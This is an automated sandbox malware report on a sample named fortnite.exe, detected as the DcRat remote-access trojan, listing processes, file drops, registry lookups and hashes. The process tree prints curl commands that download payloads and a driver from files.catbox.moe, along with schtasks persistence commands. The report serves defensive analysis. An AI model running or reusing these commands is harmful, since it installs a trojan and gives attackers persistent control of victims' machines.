Analysis
-
max time kernel
42s -
max time network
46s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/11/2024, 21:13
Static task
static1
Behavioral task
behavioral1
Sample
fortnite.exe
Resource
win10v2004-20241007-en
General
-
Target
fortnite.exe
-
Size
1.2MB
-
MD5
36f5b50cb7cf5c1eb050ce5bb6357519
-
SHA1
ffc7f0f226809fc0a8e14f40dff4f39de8eea0bf
-
SHA256
ec3e0efe8027c3aabae9ccd394fc40c87c8a6a0ff563730c8796abc31202c26b
-
SHA512
64291ce8e927281d205706ccfe8fa22580c82ff060e479c2206158e14ab0a2f40d9498cb063038505ab32135513893406922ef488dfa1bb3998cc49fe8a4550e
-
SSDEEP
24576:5xbn0OetgzfnkuGKFI+lpC+bKlAtc064:0p2n2Gz
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2316 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2824 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 316 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3512 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2300 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3992 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4720 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4756 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 388 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4708 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1004 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 620 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4136 3192 schtasks.exe 102 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 872 3192 schtasks.exe 102 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation fortnite.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Medal.exe -
Executes dropped EXE 4 IoCs
pid Process 2404 physmeme.exe 4300 mapper.exe 3652 Medal.exe 2688 MoUsoCoreWorker.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\Tasks\driver.sys curl.exe File created C:\Windows\System32\Tasks\mapper.exe curl.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files\Windows Security\RuntimeBroker.exe Medal.exe File created C:\Program Files\Windows Security\9e8d7a4ca61bd9 Medal.exe File created C:\Program Files\Windows Sidebar\Gadgets\MoUsoCoreWorker.exe Medal.exe File created C:\Program Files\Windows Sidebar\Gadgets\1f93f77a7f4778 Medal.exe File created C:\Program Files (x86)\Reference Assemblies\smss.exe Medal.exe File created C:\Program Files (x86)\Reference Assemblies\69ddcba757bf72 Medal.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings Medal.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2824 schtasks.exe 2688 schtasks.exe 4756 schtasks.exe 3720 schtasks.exe 1004 schtasks.exe 2316 schtasks.exe 1612 schtasks.exe 388 schtasks.exe 1924 schtasks.exe 3512 schtasks.exe 2300 schtasks.exe 4720 schtasks.exe 4708 schtasks.exe 620 schtasks.exe 4136 schtasks.exe 316 schtasks.exe 3992 schtasks.exe 872 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 3652 Medal.exe 2688 MoUsoCoreWorker.exe 2688 MoUsoCoreWorker.exe 2688 MoUsoCoreWorker.exe 2688 MoUsoCoreWorker.exe 2688 MoUsoCoreWorker.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3652 Medal.exe Token: SeDebugPrivilege 2688 MoUsoCoreWorker.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 4888 wrote to memory of 5092 4888 fortnite.exe 84 PID 4888 wrote to memory of 5092 4888 fortnite.exe 84 PID 4888 wrote to memory of 4696 4888 fortnite.exe 85 PID 4888 wrote to memory of 4696 4888 fortnite.exe 85 PID 4696 wrote to memory of 4756 4696 cmd.exe 86 PID 4696 wrote to memory of 4756 4696 cmd.exe 86 PID 4888 wrote to memory of 3512 4888 fortnite.exe 92 PID 4888 wrote to memory of 3512 4888 fortnite.exe 92 PID 3512 wrote to memory of 3960 3512 cmd.exe 93 PID 3512 wrote to memory of 3960 3512 cmd.exe 93 PID 4888 wrote to memory of 2780 4888 fortnite.exe 97 PID 4888 wrote to memory of 2780 4888 fortnite.exe 97 PID 2780 wrote to memory of 2776 2780 cmd.exe 98 PID 2780 wrote to memory of 2776 2780 cmd.exe 98 PID 4888 wrote to memory of 2404 4888 fortnite.exe 103 PID 4888 wrote to memory of 2404 4888 fortnite.exe 103 PID 4888 wrote to memory of 2404 4888 fortnite.exe 103 PID 4888 wrote to memory of 4060 4888 fortnite.exe 106 PID 4888 wrote to memory of 4060 4888 fortnite.exe 106 PID 2404 wrote to memory of 1088 2404 physmeme.exe 105 PID 2404 wrote to memory of 1088 2404 physmeme.exe 105 PID 2404 wrote to memory of 1088 2404 physmeme.exe 105 PID 4060 wrote to memory of 4300 4060 cmd.exe 107 PID 4060 wrote to memory of 4300 4060 cmd.exe 107 PID 1088 wrote to memory of 4024 1088 WScript.exe 117 PID 1088 wrote to memory of 4024 1088 WScript.exe 117 PID 1088 wrote to memory of 4024 1088 WScript.exe 117 PID 4024 wrote to memory of 3652 4024 cmd.exe 119 PID 4024 wrote to memory of 3652 4024 cmd.exe 119 PID 3652 wrote to memory of 4444 3652 Medal.exe 138 PID 3652 wrote to memory of 4444 3652 Medal.exe 138 PID 4444 wrote to memory of 2908 4444 cmd.exe 140 PID 4444 wrote to memory of 2908 4444 cmd.exe 140 PID 4444 wrote to memory of 3348 4444 cmd.exe 141 PID 4444 wrote to memory of 3348 4444 cmd.exe 141 PID 4444 wrote to memory of 2688 4444 cmd.exe 151 PID 4444 wrote to memory of 2688 4444 cmd.exe 151 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:4756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys3⤵
- Drops file in System32 directory
PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/awejiq --output C:\Windows\System32\Tasks\mapper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/awejiq --output C:\Windows\System32\Tasks\mapper.exe3⤵
- Drops file in System32 directory
PID:2776
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Medal\Medal.exe"C:\Medal/Medal.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UEH9JDSi5x.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:2908
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:3348
-
-
C:\Program Files\Windows Sidebar\Gadgets\MoUsoCoreWorker.exe"C:\Program Files\Windows Sidebar\Gadgets\MoUsoCoreWorker.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys2⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\Tasks\mapper.exeC:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys3⤵
- Executes dropped EXE
PID:4300
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2824
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default User\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Sidebar\Gadgets\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\Gadgets\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 13 /tr "'C:\Medal\Medal.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 13 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:872
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63B
MD5e24619181276af563705f4b1bed29490
SHA1fddac27290319f69543f5330fe97c122a8a01376
SHA256eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05
SHA5121898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591
-
Filesize
224B
MD596d43070e1e39d421c53a2f8dca13fc6
SHA107417cccceddbf8d5f5b48dec0b2e08d53a4754f
SHA2560dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314
SHA5129fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398
-
Filesize
1.8MB
MD54f66bbfed3a524398bd0267ed974ccbc
SHA1b2567397dc823412d87a23428c7833ff74586b7d
SHA256fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8
SHA512bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f
-
Filesize
236B
MD55a3aa696df6b4e845be9f36932615180
SHA1b8235dcf089e95ac532b4f15a1b3a048beb6dab9
SHA256bab146b6469e1c1133074460e3862ca07c71997be3e40aa7fcaa57e9627a8b57
SHA51295e47013ba4042244517fa37cdeba1342bd5505c8ffeb954a3ddaf2be93ceb5e69a93fe316ca58e46476022de3fcf51edf15377ee66283fd70082922c182f6bc
-
Filesize
2.1MB
MD5f4620c0afa8e21897509b2e7215097f5
SHA1af216ca6105e271a3fb45a23c10ee7cf3158b7e1
SHA2568daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82
SHA51268b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd
-
Filesize
12KB
MD510a7579c03da9baac0f2efc69673d8c2
SHA1acd27171757c05216665a332450f0604b33b07d5
SHA256797c199601f2dcee255c24da2507ba435f03dcee0fdadbe348023aa75ebb2ad3
SHA512a9cb4c7765e34bb3d8dc1356e37dfeca72e713731c036a3eb48bf69daac6c1f45910409e24ec01e1b13cd9d5d0cad708f1483cd83dcec00566cb307652fe7233
-
Filesize
641KB
MD526edf1db409a2bd4a6ff5b2b477a042e
SHA1f16e813b8f8922bc7998d174be5d22a78f051017
SHA2563fa1d1c44f240978b72b9dab0124c962723487261f101fde3c7660103d53e22d
SHA512ec1713045a9e171034c6496d4d6eced34863e7c6d19b5695adc9c5593220f01f6ee1690f0ffa8823ca11b3fd4abb5f640fb024af6a11c3f21c8cb42fc1c222f9